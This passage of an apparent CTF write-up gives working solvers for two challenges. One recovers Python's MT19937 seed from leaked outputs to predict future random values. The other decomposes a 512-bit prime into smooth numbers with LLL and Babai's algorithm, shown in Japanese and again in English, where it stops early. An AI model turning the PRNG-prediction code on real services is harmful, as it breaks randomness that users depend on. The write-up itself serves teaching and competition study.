        mt[i] = (0x6c078965 * (mt[i - 1] ^ (mt[i - 1] >> 30)) + i) & 0xffffffff
    seed = [-(mt[1] ^ (mt[0] ^ (mt[0] >> 30)) * 1664525) & 0xffffffff]
    seed.append((state_[2] - mt[2]) & 0xffffffff)
    for i in range(2, 623):
        seed.append((state_[i+1] - (mt[i+1] ^ (state_[i] ^ (state_[i] >> 30)) * 1664525)) & 0xffffffff)
    seed.append((state_[1] - (state_[623] ^ (state_[623] >> 30)) * 1664525) & 0xffffffff)
    return seed

Furthermore, we can see that seed[i] ( $3 \leq i \leq 622$ ) can be computed from state[i-1], state[i], state[i+1] as follows:

mt = [0] * 624
mt[0] = 19650218
for i in range(1, 624):
    mt[i] = (0x6c078965 * (mt[i - 1] ^ (mt[i - 1] >> 30)) + i) & 0xffffffff
 
f = lambda x: (x ^ (x >> 30)) * 1664525
g = lambda x: (x ^ (x >> 30)) * 1566083941
def _ith_seed(x, y, z, i):
    a = ((y + i) ^ g(x)) & 0xffffffff
    b = ((z + i+1) ^ g(y)) & 0xffffffff
    return (b - (mt[i+1] ^ f(a))) & 0xffffffff
 
def ith_seed(i):
    return _ith_seed(state[i-1], state[i], state[i+1], i)

5. Enumerating initial candidates

We compute seed[229] and seed[261] as follows.

Brute-force all combinations of low[0], low[1], low[2] ( $2^{18}$ cases). From these, we obtain state[228], state[229], state[230], and can compute seed[229] as _ith_seed(state[228], state[229], state[230], 229).

Brute-force low[32], low[33], low[34] and the most significant bit of state[262] ( $2^{19}$ cases). From these, we obtain state[260], state[261], state[262], and can compute seed[261] as _ith_seed(state[260], state[261], state[262], 261).

Since seed[229] = seed[261], matching these two allows us to narrow down the correct low combinations. Brute-forcing all $2^{18} \times 2^{19} = 2^{37}$ combinations across both groups and keeping only those satisfying this condition leaves an expected $2^{37} / 2^{32} = 2^5$ candidates.

6. Extending with the oracle and recovering `seed`

For each combination of low[1], low[2], low[33], low[34] narrowed down above, brute-force low[3] additionally. Then:

seed[230] can be computed as _ith_seed(state[229], state[230], state[231], 230).

From _ith_seed(state[261], state[262], z, 262) == seed[230], solving for z gives $2^6$ candidates for z, i.e., for state[263].

def solve_z(s, x, y, i):
    a = ((y + i) ^ g(x)) & 0xffffffff
    # s == (b - (mt[i+1] ^ f(a))) & 0xffffffff
    b = s + (mt[i+1] ^ f(a)) & 0xffffffff
    # b = ((z + i+1) ^ g(y)) & 0xffffffff
    z = (b ^ g(y)) - (i+1) & 0xffffffff
    return z

Repeating this twice more gives us state[263], state[264], from which we can compute output[262], output[263] and then the next value of random.random(). Sending this to the server lets the oracle verify correctness. If happy is returned, the low combination up to that point is correct (strictly, even if not all low values are correct, cases that produce the same output as the correct one exist, so we narrow down by continuing further).

Each oracle call yields 2 new seed values, so repeating this 13 times recovers seed[229:256]. seed[240:256] corresponds to init_key[16:32], i.e., the value passed to random.seed, so feeding this value to our local random reproduces the same state as the server, allowing complete prediction of future outputs.

Feeding the predicted random.random() values to the oracle yields the flag.

Note: since $10^6$ interactions are required, sending and receiving one at a time accumulates round-trip latency and is not feasible in reasonable time. Sending multiple predicted values at once in a batch resolves this.

The full solver is as follows.

Solver (click to expand)

import ast
from pwn import *
import itertools
from tqdm import tqdm, trange
 
BATCH_SIZE = 1024
 
def temper(x):
    x = x ^ (x >> 11)
    x = x ^ ((x << 7) & 0x9d2c5680)
    x = x ^ ((x << 15) & 0xefc60000)
    x = x ^ (x >> 18)
    return x & 0xffffffff
def untemper(y):
    y ^= y >> 18
    y ^= y << 15 & 0xefc60000
    y ^= (y << 7 & 0x9d2c5680) ^ (y << 14 & 0x94284000) ^ (y << 21 & 0x14200000) ^ (y << 28 & 0x10000000)
    y ^= y >> 11 ^ y >> 22
    return y
f = lambda x: (x ^ (x >> 30)) * 1664525
g = lambda x: (x ^ (x >> 30)) * 1566083941
def ith_seed(x, y, z, i):
    a = ((y + i) ^ g(x)) & 0xffffffff
    b = ((z + i+1) ^ g(y)) & 0xffffffff
    return (b - (mt[i+1] ^ f(a))) & 0xffffffff
def untwist(i, d, k):
    y = untemper(leak[i-227] ^ leak[i] ^ d)
    s = y << 1 ^ (y >> 31) * 0x1321161bf
    return s & 0x7fffffff | k * 0x80000000, s >> 31
 
sc = remote("localhost", 1337)
 
raw_leak = ast.literal_eval(sc.recvline().decode())
 
leak = []
for i in range(131):
    v = int(raw_leak[i]*0x20000000000000)
    v1, v2 = v>>26, v&0x3ffffff
    leak += [v1<<5, v2<<6]
 
mt = [0] * 624
mt[0] = 19650218
for i in range(1, 624):
    mt[i] = (0x6c078965 * (mt[i - 1] ^ (mt[i - 1] >> 30)) + i) & 0xffffffff
 
happiness = 0
correct = {}
def oracle(val):
    global happiness
    sc.sendline(str(val).encode())
    res = sc.recvline(timeout=1).rstrip() == b"correct :)"
    happiness += 1 if res else -1
    return res
 
def check_all(i, lst):
    global happiness
    ret = []
    pbar = trange(0, len(lst), BATCH_SIZE)
    pbar.set_description(f"{i=}")
    for j in pbar:
        batch = []
        for a, b in lst[j:min(j+BATCH_SIZE, len(lst))]:
            val = (a * 0x4000000 + b) / 0x20000000000000
            batch.append(val)
        sent = False
        if i not in correct:
            sent = True
            sc.sendline("\n".join(map(str, batch)).encode())
        for a, b in lst[j:min(j+BATCH_SIZE, len(lst))]:
            if sent:
                res = sc.recvline().rstrip()
                assert res in (b"incorrect :(", b"correct :)"), res
                res = res == b"correct :)"
                happiness += 1 if res else -1
            if i in correct:
                ret.append(correct[i] == (a, b))
            else:
                ret.append(res)
                if res:
                    correct[i] = (a, b)
    return ret
 
 
def next_cands(i, dis, djs, seed_arr, K):
    *_, d0i, d1i = dis
    *_, d0j, d1j = djs
    for d2i, t in itertools.product(range(64), range([2, 1][i % 2])):
        _, k = untwist(i-31, 0, 0)
        st231, k = untwist(i-32, d2i, k)
        st230, k = untwist(i-33, d1i, k)
        st229, k = untwist(i-34, d0i, k)
        se = ith_seed(st229, st230, st231, i-32)
 
        st262, k = untwist(i-1, d1j, K)
        st261, k = untwist(i-2, d0j, k)
 
        v = ((st262 + i) ^ g(st261)) & 0xffffffff
        st263 = (((se + (mt[i+1] ^ f(v))) ^ g(st262)) - (i+1)) & 0xffffffff
 
        x = st263 & 0x7fffffff | K * 0x80000000
        a262 = leak[i-227] ^ temper((x >> 1) ^ (x & 1) * 0x9908b0df)
        d2j = (a262&0x3f) ^ (t<<5)
 
        if i % 2 == 0:
            leak.append(a262 ^ d2j)
            yield from next_cands(i+1, dis + [d2i], djs + [d2j], seed_arr + [se - i % 32], st263>>31)
            leak.pop()
        else:
            yield (leak[-1], a262 ^ d2j, dis + [d2i], djs + [d2j], seed_arr + [se - i % 32], st263>>31)
 
def search_last(i, seed_arr):
    seed = b"".join([v.to_bytes(4, "big") for v in seed_arr[:-17:-1]])
    random.seed(seed)
    if raw_leak == [random.random() for _ in range(len(raw_leak))]:
        print(seed)
        print(happiness)
        while not oracle(random.random()):
            pass
        cnt = -happiness + 10**6
        for j in trange(0, cnt, BATCH_SIZE):
            sc.sendline("\n".join(str(random.random()) for _ in range(j, min(j+BATCH_SIZE, cnt))).encode())
            for _ in range(j, min(j+BATCH_SIZE, cnt)):
                assert sc.recvline() == b"correct :)\n"
        print(sc.recvline())
        exit(0)
 
def search(i, dis, djs, seed_arr, K):
    if len(seed_arr) == 27:
        search_last(i, seed_arr)
        return
 
    cands = list(next_cands(i, dis, djs, seed_arr, K))
    ret = check_all(i, [(x>>5, y>>6) for x, y, _, _, _, _ in cands])
    for res, (x, y, _dis, _djs, _seed_arr, _K) in zip(ret, cands):
        if res:
            print(i, x, y, len(leak))
            leak.append(x)
            leak.append(y)
            search(i+2, _dis, _djs, _seed_arr, _K)
            leak.pop()
            leak.pop()
 
seeds = {}
for d0i, d1i, d2i in tqdm(itertools.product(range(64), range(64), range(64))):
    _, k = untwist(230, 0, 0)
    st230, k = untwist(229, d2i, k)
    st229, k = untwist(228, d1i, k)
    st228, k = untwist(227, d0i, k)
    se229 = ith_seed(st228, st229, st230, 229)
    seeds[se229] = (d0i, d1i, d2i)
for d0j, d1j, d2j, K in itertools.product(range(64), range(64), range(64), range(2)):
    st262, k = untwist(261, d2j, K)
    st261, k = untwist(260, d1j, k)
    st260, k = untwist(259, d0j, k)
    se261 = ith_seed(st260, st261, st262, 261)
    if se261 in seeds:
        d0i, d1i, d2i = seeds[se261]
        search(262, [d1i, d2i], [d1j, d2j], [se261+256], K)

Creating this challenge gave me quite a bit of knowledge about MT19937 (including things not covered in this article), so I plan to write a more detailed article summarizing techniques related to MT19937. Stay tuned.

crypto

Expensive Operator (1 solve)

問題

次のようなサーバが与えられます。

import os
import signal
import re
from Crypto.Util.number import getPrime
 
signal.alarm(150)
 
flag = os.environ.get("FLAG", "tkbctf{dummy}")
target = getPrime(512)
print(f"{target = }")
 
cost = 0
variables = {"one": 1}
while True:
    expr = input(">>> ")
    if not re.fullmatch(r"[a-z]+=[a-z]+[+*][a-z]+", expr):
        print("SyntaxError")
        continue
    cost += expr.count("+")
    exec(expr, {"__builtins__": None}, variables)
    if expr.startswith("result="):
        break
 
if variables["result"] != target:
    print("Wrong answer!")
    exit(1)
score = 2300 // cost
print(f"Score: {score} / 100")
if score >= 100:
    print(f"You passed my exam! flag: {flag}")
else:
    print("Try harder!")

a = b + c または a = b * c という形式の式を入力して、変数を定義していくことができます。初期状態では one = 1 だけが定義されており、最終的に result を512bitのランダムな整数 target と同じ値にする必要があります。 + を使った回数に応じてスコアが計算され、スコアが 100 以上、つまり 23 回以下の加算でtargetを作ることができればフラグが得られます。乗算演算子 * は自由に使用できるので、できるだけ乗算を使って大きな数を作り、加算の回数を減らすことが求められます。

解法

方針として、最初に小さい素数を + で作り、それらの積で作れるsmoothな数の和で target を構成することを考えます。

1. 小さい素数を用意する

variables には one = 1 が入っているので、一つ前までの素数で $p-1$ を作り、 $1$ を足すという方法によって一回の+で $p$ が構成できます。使う素数の数と同じだけ + を使う必要があります。

$2,3,5,7,11,13,17,19,23,29$ の 10 個まで作ることにすると、素数生成に 10 回の + がかかり、残りの 13 回を「smoothな数の和」に使えます。つまりsmoothな数を最大 14 個まで足すことができます。

2. `target` をsmoothな数の和に分解する

「高々 $n$ 個のsmoothな数の和で $T$ を表す」という問題を考えます（最初は $T = \text{target}$ ）。できるだけ $T$ に近いsmooth数 $a$ を選ぶと、「高々 $n-1$ 個のsmoothな数の和で $T - a$ を表す」という問題に帰着できます。 $T$ と上位bitを $512 / 14 \approx 37$ bit程度一致させることを繰り返すことができれば、14個のsmoothな数の和でtargetを表すことができるはずです。

smoothな数は $\prod_i p_i^{a_i}$ と書けるので、 $\log$ を取れば $\sum_i a_i \log p_i$ と表せます。 $T$ と上位 $m$ bitを一致させることを目標とすると、 $L=T - 2^{ \lfloor \log T \rfloor - m }$ として、

\log L \leq \sum_i a_i \log p_i \leq \log T \\ 0 \leq a_i (0 \leq i < 10)

を満たすように $a_i$ を選ぶ問題と言えます。

これはLLLで解くことができる最近ベクトル問題に近い形をしています。実際、精度パラメータ $P$ を用いて以下のように格子基底 $B$ と目的ベクトル $\mathbf{t}$ を構成し、

B = \begin{pmatrix} \lfloor \log_2 p_0 \cdot 2^P \rfloor & 1 & 0 & \cdots & 0 \\ \lfloor \log_2 p_1 \cdot 2^P \rfloor & 0 & 1 & \cdots & 0 \\ \vdots & \vdots & \vdots & \ddots & \vdots \\ \lfloor \log_2 p_9 \cdot 2^P \rfloor & 0 & 0 & \cdots & 1 \end{pmatrix}

\mathbf{t} = \left(\frac{\lfloor \log_2 L \cdot 2^P \rfloor + \lfloor \log_2 T \cdot 2^P \rfloor}{2}, \frac{\lceil \log_2 T / \log_2 p_0 \rceil}{2},\ \ldots,\ \frac{\lceil \log_2 T / \log_2 p_9 \rceil}{2} \right)

適切に重み付けした後にBabai's Nearest Plane Algorithmを適用すると、最適解に近い解が高速に得られます。

なお、smooth数 $a$ を $T$ から引いた後の $T - a$ がsmoothな因子を持つ場合があります。この因子の部分を毎回除いておくことで、次のステップで処理すべき $T$ を更に小さくできます。

ここまでを実装すると、16個の値の和で target を表すことができ、92点が得られるはずです。ここから更に改善が必要です。

3. 更に改善する

ビームサーチ

$a$ の選び方によって次以降のステップで得られる $a$ の値が大きく変わるため、貪欲に $T$ に近い値を $a$ として選ぶのは最適とは限りません。そこで複数の $a$ を同時に保持し、各ステップで $(T - a) / s$ のbit数が小さい上位N個だけを残して探索を続けるビームサーチを適用します。

Babai's Nearest Plane Algorithmから複数の候補を得る

通常のBabai's Nearest Plane Algorithmでは、各ステップで目標に最も近い整数を選ぶことで格子点の近似解を1点求めます。これを拡張して、各ステップで近い整数を複数候補として分岐させ、目標ベクトルへの距離スコアが小さい順に候補集合を管理します。これにより1回のCVP求解から複数のsmooth数候補が得られます。また、 $m$ などのパラメータを変えて複数回CVPを解くことでも候補を増やすことができます。

終端処理

$12$ 回の削減を行った後、最後の2項の決め方を工夫します。 $2^{32}$ 未満の29-smoothな数をあらかじめ全列挙しておいたソート済みリストを用意し、左端と右端の2つのインデックスから順に和を計算しながら絞り込むことで、 $T$ をちょうど2つのsmooth数の和に分解します。

以上の工夫を組み合わせることで、安定して23回以下の加算で target を表せるようになります。

ソルバは以下の通りです。

ソルバ（クリックで展開）

import heapq
import math
from pathlib import Path
import string
 
from pwn import process
from sage.all import Matrix, Primes, RR, RealField, ZZ, ceil, floor, identity_matrix, vector
 
 
NPR = 10
TARGET_COST = 23
MAX_TOTAL_TERMS = TARGET_COST - NPR + 1
 
MULTI_BABAI_CHOICES = 2
MULTI_BABAI_FRONTIER = 32
 
BEAM_WIDTH = 10
NEXT_STATES_WIDTH = BEAM_WIDTH * 3
LOCAL_CHILDREN = 2
MID_CHILDREN = 2
LATE_CHILDREN = 3
PER_M = 2
 
LAST2_EXACT_BITS = 40
LAST2_OLD_BITS = 54
 
PRIMES = [int(Primes()[i]) for i in range(NPR)]
CONSTRUCT_CACHE = {}
 
 
def factor_exponents(value):
    exponents = [0] * NPR
    rem = value
    for idx, prime in enumerate(PRIMES):
        while rem % prime == 0:
            exponents[idx] += 1
            rem //= prime
    assert rem == 1
    return exponents
 
 
def smallest_prime_factor(value):
    for prime in PRIMES:
        if value % prime == 0:
            return prime
    raise ValueError(value)
 
 
def build_primitives(limit):
    ops = []
    for value in range(2, limit + 1):
        prime = smallest_prime_factor(value)
        if prime == value:
            ops.append(("+", value - 1, 1))
        else:
            ops.append(("*", value // prime, prime))
    return ops
 
 
def construct_ops(terms):
    ops = build_primitives(PRIMES[-1])
    acc = 0
    for term in terms:
        cur = 1
        for prime, exponent in zip(PRIMES, factor_exponents(term)):
            for _ in range(exponent):
                ops.append(("*", cur, prime))
                cur *= prime
        if acc:
            ops.append(("+", acc, cur))
        acc += cur
    return ops
 
 
def operate(ops):
    values = {1}
    cost = 0
    for op, left, right in ops:
        assert left in values and right in values
        if op == "+":
            values.add(left + right)
            cost += 1
        else:
            values.add(left * right)
    return cost, values
 
 
def smooth_factor(value):
    factor = 1
    rem = value
    for prime in PRIMES:
        while rem % prime == 0:
            rem //= prime
            factor *= prime
    return factor
 
 
def is_smooth(value):
    rem = value
    for prime in PRIMES:
        while rem % prime == 0:
            rem //= prime
    return rem == 1
 
 
def map_varname(value):
    if value == 1:
        return "one"
    out = ""
    rem = value
    while rem:
        out += string.ascii_lowercase[rem % 26]
        rem //= 26
    return out
 
 
def choose_prec(target, m_bits):
    bits = max(2, target.bit_length())
    exp_budget = sum(int(math.ceil(bits / math.log2(prime))) for prime in PRIMES)
    slack = max(8, (exp_budget + 1).bit_length() + 6)
    return max(48, m_bits + slack)
 
 
def lower_bound_for_m(target, m_bits):
    shift = target.bit_length() - m_bits
    if shift > 0:
        lower = target - (1 << shift)
    else:
        lower = 1
    if lower <= 0:
        lower = 1
    return lower
 
 
def construct_context(prec):
    cached = CONSTRUCT_CACHE.get(prec)
    if cached is not None:
        return cached
    field = RealField(prec)
    prime_logs = [field(prime).log(2) for prime in PRIMES]
    base_matrix = (
        Matrix(ZZ, [ZZ(v * 2**prec) for v in prime_logs])
        .stack(identity_matrix(NPR, NPR))
        .transpose()
    )
    cached = (field, prime_logs, base_matrix)
    CONSTRUCT_CACHE[prec] = cached
    return cached
 
 
def build_cvp_instance(target, m_bits):
    if target <= 1:
        return None
    prec = choose_prec(target, m_bits)
    lower = lower_bound_for_m(target, m_bits)
    if lower >= target:
        return None
 
    field, prime_logs, base_matrix = construct_context(prec)
    target_log = field(target).log(2)
    lower_log = field(lower).log(2)
    lbs = [floor(lower_log * 2**prec)] + [0] * NPR
    ubs = [floor(target_log * 2**prec)] + [ceil(target_log / prime_logs[idx]) for idx in range(NPR)]
 
    mat = Matrix(ZZ, base_matrix)
    lb = list(lbs)
    ub = list(ubs)
    max_element = max(abs(mat[row, col]) for row in range(mat.nrows()) for col in range(mat.ncols()))
    weight = mat.ncols() * max_element
    max_diff = max(ub[idx] - lb[idx] for idx in range(mat.ncols()))
    applied_weights = []
    for col in range(mat.ncols()):
        width = ub[col] - lb[col]
        if width == 0:
            col_weight = weight
        else:
            col_weight = max(1, max_diff // width)
        applied_weights.append(int(col_weight))
        for row in range(mat.nrows()):
            mat[row, col] *= col_weight
        lb[col] *= col_weight
        ub[col] *= col_weight
 
    target_vec = vector(ZZ, [(lb[idx] + ub[idx]) // 2 for idx in range(mat.ncols())])
    return {
        "matrix": mat,
        "target": target_vec,
        "weights": applied_weights,
        "limit": int(target),
    }
 
 
def nearest_integers(value, count):
    center = int(value.round())
    out = []
    seen = set()
    radius = 0
    while len(out) < count:
        if radius == 0:
            cands = [center]
        else:
            cands = [center - radius, center + radius]
        cands.sort(key=lambda cand: (abs(value - cand), abs(cand - center), cand))
        for cand in cands:
            if cand in seen:
                continue
            seen.add(cand)
            out.append(cand)
            if len(out) >= count:
                break
        radius += 1
    return out
 
 
def babai_points(matrix, target_vec):
    basis = Matrix(ZZ, matrix).LLL(algorithm="flatter")
    gs = basis.gram_schmidt()[0]
    zero = vector(ZZ, [0] * len(target_vec))
    frontier = [(RR(0), target_vec, zero)]
 
    for row_idx in reversed(range(basis.nrows())):
        denom = gs[row_idx] * gs[row_idx]
        next_frontier = []
        for score, diff, point in frontier:
            if denom == 0:
                coeffs = [0]
            else:
                coord = (diff * gs[row_idx]) / denom
                coeffs = nearest_integers(coord, MULTI_BABAI_CHOICES)
            for coeff in coeffs:
                row = basis[row_idx] * coeff
                diff2 = diff - row
                point2 = point + row
                if denom == 0:
                    extra = RR(0)
                else:
                    extra = (coord - coeff) ** 2 * denom
                next_frontier.append((score + extra, diff2, point2))
        next_frontier.sort(key=lambda item: item[0])
        frontier = []
        seen = set()
        for item in next_frontier:
            key = tuple(int(v) for v in item[2])
            if key in seen:
                continue
            seen.add(key)
            frontier.append(item)
            if len(frontier) >= MULTI_BABAI_FRONTIER:
                break
    return [item[2] for item in frontier]
 
 
def decode_point(point, instance):
    exponents = []
    for idx, weight in enumerate(instance["weights"][1:]):
        coord = int(point[idx + 1])
        if coord % weight != 0:
            return None
        exponent = coord // weight
        if exponent < 0:
            return None
        exponents.append(exponent)
 
    value = 1
    for prime, exponent in zip(PRIMES, exponents):
        value *= prime ** exponent
    if value > instance["limit"]:
        return None
    return int(value)
 
 
def construct_candidates(target, m_bits):
    instance = build_cvp_instance(target, m_bits)
    if instance is None:
        return []
    out = []
    seen = set()
    for point in babai_points(instance["matrix"], instance["target"]):
        value = decode_point(point, instance)
        if value is None or value in seen:
            continue
        seen.add(value)
        out.append(value)
        if len(out) >= PER_M:
            break
    return out
 
 
def iter_construct_candidates(rem):
    start_m = min(60, rem.bit_length() - 1)
    for m_bits in range(start_m, 15, -1):
        for value in construct_candidates(rem, m_bits):
            yield m_bits, value
 
 
def step_state(rem, common, terms, summand):
    next_raw = rem - summand
    factor = smooth_factor(next_raw)
    return next_raw // factor, common * factor, terms + [summand * common]
 
 
def order_states(states):
    states.sort(key=lambda st: st[0])
    out = []
    seen = set()
    for state in states:
        key = (state[0], state[1])
        if key in seen:
            continue
        seen.add(key)
        out.append(state)
    return out
 
 
def choose_child_limits(rem_bits):
    if rem_bits <= 80:
        return LATE_CHILDREN, LATE_CHILDREN * 2
    if rem_bits <= 120:
        return MID_CHILDREN, MID_CHILDREN * 2
    return LOCAL_CHILDREN, LOCAL_CHILDREN
 
 
def collect_children(rem, common, terms, limit=None, raw_limit=None, m_band=None):
    rem_bits = rem.bit_length()
    if limit is None or raw_limit is None:
        default_limit, default_raw = choose_child_limits(rem_bits)
        if limit is None:
            limit = default_limit
        if raw_limit is None:
            raw_limit = default_raw
 
    children = []
    seen_summands = set()
 
    def add_child(m_bits, summand):
        if summand >= rem or summand in seen_summands:
            return
        seen_summands.add(summand)
        children.append((*step_state(rem, common, terms, summand), m_bits))
 
    if m_band is None:
        for m_bits, summand in iter_construct_candidates(rem):
            add_child(m_bits, summand)
            if len(children) >= raw_limit:
                break
    else:
        start_m = min(60, rem_bits - 1)
        stop_m = max(16, start_m - m_band + 1)
        for m_bits in range(start_m, stop_m - 1, -1):
            for summand in construct_candidates(rem, m_bits):
                add_child(m_bits, summand)
        if len(children) < raw_limit:
            for m_bits in range(stop_m - 1, 15, -1):
                for summand in construct_candidates(rem, m_bits):
                    add_child(m_bits, summand)
                    if len(children) >= raw_limit:
                        break
                if len(children) >= raw_limit:
                    break
 
    best = {}
    for child in children:
        key = child[0]
        if key not in best:
            best[key] = child
    out = list(best.values())
    out.sort(key=lambda st: st[0])
    return out[:limit]
 
 
values = []
def rec(idx, cur):
    if idx == len(PRIMES):
        values.append(cur)
        return
    prime = PRIMES[idx]
    value = cur
    while value < 2**32:
        rec(idx + 1, value)
        value *= prime
rec(0, 1)
values.sort()
 
def solve_last2(total):
    left = 0
    right = len(values) - 1
    while left <= right:
        pair_sum = values[left] + values[right]
        if pair_sum == total:
            return values[left], values[right]
        if pair_sum < total:
            left += 1
        else:
            right -= 1
    return None
 
def close_state(depth, rem, common, terms):
    remaining_terms = MAX_TOTAL_TERMS - depth
    if remaining_terms >= 1 and is_smooth(rem):
        print(f"    [close last1] depth={depth} rem_bits={rem.bit_length()} total_terms={len(terms) + 1}")
        return terms + [rem * common]
    if remaining_terms >= 2 and rem < 2**32:
        pair = solve_last2(rem)
        if pair is not None:
            print(f"    [close last2] depth={depth} rem_bits={rem.bit_length()} total_terms={len(terms) + 2}")
            return terms + [pair[0] * common, pair[1] * common]
    return None
 
 
def find_terms_cost23(target):
    common = smooth_factor(target)
    rem = target // common
    ans = close_state(0, rem, common, [])
    if ans is not None:
        return ans
 
    beam = [(rem, common, [])]
    print(f"[+] search n={NPR} beam={BEAM_WIDTH} target_cost<={TARGET_COST} max_terms={MAX_TOTAL_TERMS}")
    for depth in range(1, MAX_TOTAL_TERMS):
        child_buffers = []
        child_heap = []
        for parent_idx, (rem, common, terms) in enumerate(beam):
            children = collect_children(rem, common, terms)
            if not children:
                continue
            child_buffers.append(children)
            rem2, _common2, _terms2, _m_bits = children[0]
            heapq.heappush(child_heap, (rem2, len(child_buffers) - 1, 0))
        if not child_heap:
            break
 
        next_states = []
        while child_heap and len(next_states) < NEXT_STATES_WIDTH:
            _key, buf_idx, child_idx = heapq.heappop(child_heap)
            rem2, common2, terms2, _m_bits = child_buffers[buf_idx][child_idx]
            ans = close_state(depth, rem2, common2, terms2)
            if ans is not None:
                return ans
            next_states.append((rem2, common2, terms2))
            next_idx = child_idx + 1
            if next_idx < len(child_buffers[buf_idx]):
                rem3, _common3, _terms3, _m_bits = child_buffers[buf_idx][next_idx]
                heapq.heappush(child_heap, (rem3, buf_idx, next_idx))
 
        if not next_states:
            break
 
        ordered = order_states(next_states)
        beam = ordered[:BEAM_WIDTH]
        print(f"  [depth {depth}] pool={len(ordered)} kept={len(beam)} best_bits={[state[0].bit_length() for state in beam]}")
    raise RuntimeError(f"search failed within target_cost={TARGET_COST}")
 
 
def send_solution(conn, target, terms):
    ops = construct_ops(terms)
    cost, values = operate(ops)
    assert target in values
    assert cost <= TARGET_COST, cost
 
    declared = set()
    for op, left, right in ops:
        out = left + right if op == "+" else left * right
        if out in declared:
            continue
        conn.sendline(f"{map_varname(out)}={map_varname(left)}{op}{map_varname(right)}".encode())
        declared.add(out)
    conn.sendline(f"result=one*{map_varname(target)}".encode())
 
 
def main():
    conn = remote("localhost", 1337)
    conn.recvuntil(b"target = ")
    target = int(conn.recvline())
    print(f"[+] target bits={target.bit_length()}")
    terms = find_terms_cost23(target)
    cost = NPR + len(terms) - 1
    print(f"[+] found candidate terms={len(terms)} cost={cost}")
    send_solution(conn, target, terms)
    print(conn.recvall(timeout=3).decode(errors="replace"), end="")
 
 
if __name__ == "__main__":
    main()

作問時点では思いついていませんでしたが、使用する素数を $2,3,5,7,11,13$ の 6 個に絞ると $T$ 以下の最大のsmoothな数を厳密に求めることが高速にできます。使用する素数が6個の場合18個のsmoothな数の和で target を表すことができればよく、10個の場合と比べて4個余裕ができますが、その分smoothな数の自由度が小さく、密度が下がるため、一度に一致させることのできるbit数が減るというトレードオフが発生します。追加で実験したところ、使用する素数を6個に絞った場合でもコスト24までは達成できましたが、コスト23はおそらく難しい、またはかなり確率が低いと思われます。

この見た目でLLLを要求するというのが面白ポイントだったんですが、競プロ的なアルゴリズムで24コストまでは達成できてしまうことがrabbit holeになってしまったようで反省です。

crypto

Expensive Operator (1 solve)

Challenge

The following server is given.

import os
import signal
import re
from Crypto.Util.number import getPrime
 
signal.alarm(150)
 
flag = os.environ.get("FLAG", "tkbctf{dummy}")
target = getPrime(512)
print(f"{target = }")
 
cost = 0
variables = {"one": 1}
while True:
    expr = input(">>> ")
    if not re.fullmatch(r"[a-z]+=[a-z]+[+*][a-z]+", expr):
        print("SyntaxError")
        continue
    cost += expr.count("+")
    exec(expr, {"__builtins__": None}, variables)
    if expr.startswith("result="):
        break
 
if variables["result"] != target:
    print("Wrong answer!")
    exit(1)
score = 2300 // cost
print(f"Score: {score} / 100")
if score >= 100:
    print(f"You passed my exam! flag: {flag}")
else:
    print("Try harder!")

You can define variables by entering expressions of the form a = b + c or a = b * c. Initially only one = 1 is defined, and you must make result equal to the 512-bit random integer target. The score is computed based on how many times + was used, and if the score is 100 or more — i.e., if you can construct target with 23 or fewer additions — you get the flag. The multiplication operator * can be used freely, so the goal is to use multiplication as much as possible to build large numbers and reduce the number of additions.

Solution

The strategy is to first build small primes with +, then represent target as a sum of smooth numbers whose factors are products of those primes.

1. Prepare small primes

Since variables contains one = 1, we can construct any prime $p$ in one + by building $p-1$ from the previous primes and adding $1$ . We need as many + operations as the number of primes.

If we build up to $2,3,5,7,11,13,17,19,23,29$ (10 primes), preparing them takes 10 + operations, leaving 13 for "sum of smooth numbers". So we can add at most 14 smooth numbers.

2. Decompose `target` into a sum of smooth numbers

Consider the challenge of "representing $T$ as a sum of at most $n$ smooth numbers" (initially $T = \text{target}$ ). By choosing a smooth number $a$ as close to $T$ as possible, it reduces to "representing $T - a$ as a sum of at most $n-1$ smooth numbers." If we can match the top $512 / 14 \approx 37$ bits of $T$ repeatedly, we should be able to represent target as a sum of 14 smooth numbers.

A smooth number can be written as $\prod_i p_i^{a_i}$ , so taking $\log$ gives $\sum_i a_i \log p_i$ . Targeting a match of the top $m$ bits with $T$ , and letting $L = T - 2^{\lfloor \log T \rfloor - m}$ , the challenge becomes choosing $a_i$ satisfying:

\log L \leq \sum_i a_i \log p_i \leq \log T \\ 0 \leq a_i \quad (0 \leq i < 10)

This resembles a Closest Vector Problem (CVP) solvable with LLL. Specifically, using precision parameter $P$ , construct lattice basis $B$ and target vector $\mathbf{t}$ as:

B = \begin{pmatrix} \lfloor \log_2 p_0 \cdot 2^P \rfloor & 1 & 0 & \cdots & 0 \\ \lfloor \log_2 p_1 \cdot 2^P \rfloor & 0 & 1 & \cdots & 0 \\ \vdots & \vdots & \vdots & \ddots & \vdots \\ \lfloor \log_2 p_9 \cdot 2^P \rfloor & 0 & 0 & \cdots & 1 \end{pmatrix}

\mathbf{t} = \left(\frac{\lfloor \log_2 L \cdot 2^P \rfloor + \lfloor \log_2 T \cdot 2^P \rfloor}{2}, \frac{\lceil \log_2 T / \log_2 p_0 \rceil}{2},\ \ldots,\ \frac{\lceil \log_2 T / \log_2 p_9 \rceil}{2} \right)

Applying Babai's Nearest Plane Algorithm after appropriate weighting yields a near-optimal solution quickly.

Note that after subtracting a smooth number $a$ from $T$ , the remainder $T - a$ may have smooth factors. Removing these factors each time allows us to make the $T$ to process in the next step even smaller.

Implementing this allows us to represent target as a sum of 16 values, giving a score of 92. Further improvements are needed.

3. Further improvements

Beam search

Since the choice of $a$ can greatly affect the values of $a$ obtained in subsequent steps, greedily choosing $a$ closest to $T$ is not always optimal. Therefore, we maintain multiple values of $a$ simultaneously and apply beam search, keeping only the top N states where the bit length of $(T - a) / s$ is smallest at each step.

Obtaining multiple candidates from Babai's Nearest Plane Algorithm

Standard Babai's Nearest Plane Algorithm finds one approximate lattice point by choosing the nearest integer at each step. By extending this to branch on multiple nearby integer candidates at each step and maintaining the candidate set ordered by distance score to the target vector, multiple smooth number candidates can be obtained from a single CVP solve. Additionally, solving CVP multiple times with different parameters like $m$ increases the candidates further.

Terminal processing

After 12 reductions, we finalize the last 2 terms carefully. Prepare a pre-sorted list of all 29-smooth numbers below $2^{32}$ , then use a two-pointer approach from the leftmost and rightmost indices, computing sums and narrowing down to decompose $T$ into exactly 2 smooth numbers.

Combining all these improvements, we can stably represent target with 23 or fewer additions.

The solver is as follows.

Solver (click to expand)

import heapq
import math
from pathlib import Path
import string
 
from pwn import process
from sage.all import Matrix, Primes, RR, RealField, ZZ, ceil, floor, identity_matrix, vector
 
 
NPR = 10
TARGET_COST = 23
